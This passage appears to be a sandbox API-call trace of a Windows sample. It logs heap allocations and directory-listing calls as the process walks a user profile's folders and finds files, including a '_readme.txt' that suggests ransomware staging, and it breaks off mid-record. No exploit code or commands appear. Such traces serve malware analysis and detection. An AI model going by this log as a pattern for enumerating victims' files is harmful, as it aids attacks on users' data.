[0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.252] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0094.252] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce410 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x310) returned 0x3340958 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce340 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0094.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d98 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce068 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x69ba50 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce680 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x69baa8 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x69bb00 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce6e8 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x69bb58 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce750 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x69bbb0 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x69bc08 [0094.253] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0094.253] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x3336348 [0094.253] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa03f1130, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa03f1130, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0094.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0094.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33184a8 [0094.254] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1b2ca60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1b2ca60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b2ca60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.254] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1b2ca60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1b2ca60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b2ca60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.254] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.254] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0094.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.254] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0094.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.254] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0094.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.255] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0094.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.255] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.255] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0094.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.255] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.255] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.255] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.255] PathFindFileNameW (pszPath="") returned="" [0094.255] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.255] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.256] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.256] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9e316400, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x9e316400, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x3330810 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce4e0 [0094.256] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x3331b88 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce478 [0094.256] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa088dbd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa088dbd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x3338dc8 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce270 [0094.256] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce1a0 [0094.257] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa088dbd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa088dbd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0094.257] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.257] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0094.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.257] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.257] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.257] PathFindFileNameW (pszPath="") returned="" [0094.257] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0094.257] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa088dbd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa088dbd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0094.258] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.258] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0094.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.258] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.258] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.258] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.258] PathFindFileNameW (pszPath="") returned="" [0094.258] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0094.258] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.259] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.259] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0094.259] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0094.259] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0094.259] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0094.259] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.259] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0094.259] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0094.259] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0094.259] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.259] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0094.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.259] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.259] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.259] PathFindFileNameW (pszPath="") returned="" [0094.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.260] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0094.260] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0094.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.260] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.260] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.260] PathFindFileNameW (pszPath="") returned="" [0094.260] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0094.260] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8926dae0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x8926dae0, 